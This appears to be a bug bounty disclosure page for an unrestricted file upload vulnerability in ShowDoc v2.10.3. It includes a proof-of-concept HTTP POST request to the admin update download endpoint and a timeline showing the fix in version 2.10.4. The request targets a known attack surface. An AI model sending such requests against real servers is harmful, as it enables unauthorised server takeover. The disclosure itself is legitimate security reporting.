There is a Unrestricted Upload of File vulnerability in ShowDoc v2.10.3 in star7th/showdoc


Reported on

Mar 20th 2022


There is a Unrestricted Upload of File vulnerability in AdminUpdateController.class.php in ShowDoc v2.10.3

Proof of Concept

POST /showdoc-2.10.3/server/index.php?s=/api/adminUpdate/download HTTP/1.1
Content-Length: 66
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=47uvgq7efm1ethua6a8podcse6; think_language=zh-CN; cookie_token=09d404934af99f9a7cafad11e061df0c23fc785a28781b655a152a7b1eb43000
Connection: origin



After the attacker login to the admin panel, the vulnerability can be used to obtain server privileges.

We are processing your report and will contact the star7th/showdoc team within 24 hours. a year ago
We have contacted a member of the star7th/showdoc team and are waiting to hear back a year ago
star7th validated this vulnerability a year ago
Xiaoshui has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th marked this as fixed in 2.10.4 with commit bd792a a year ago
star7th has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation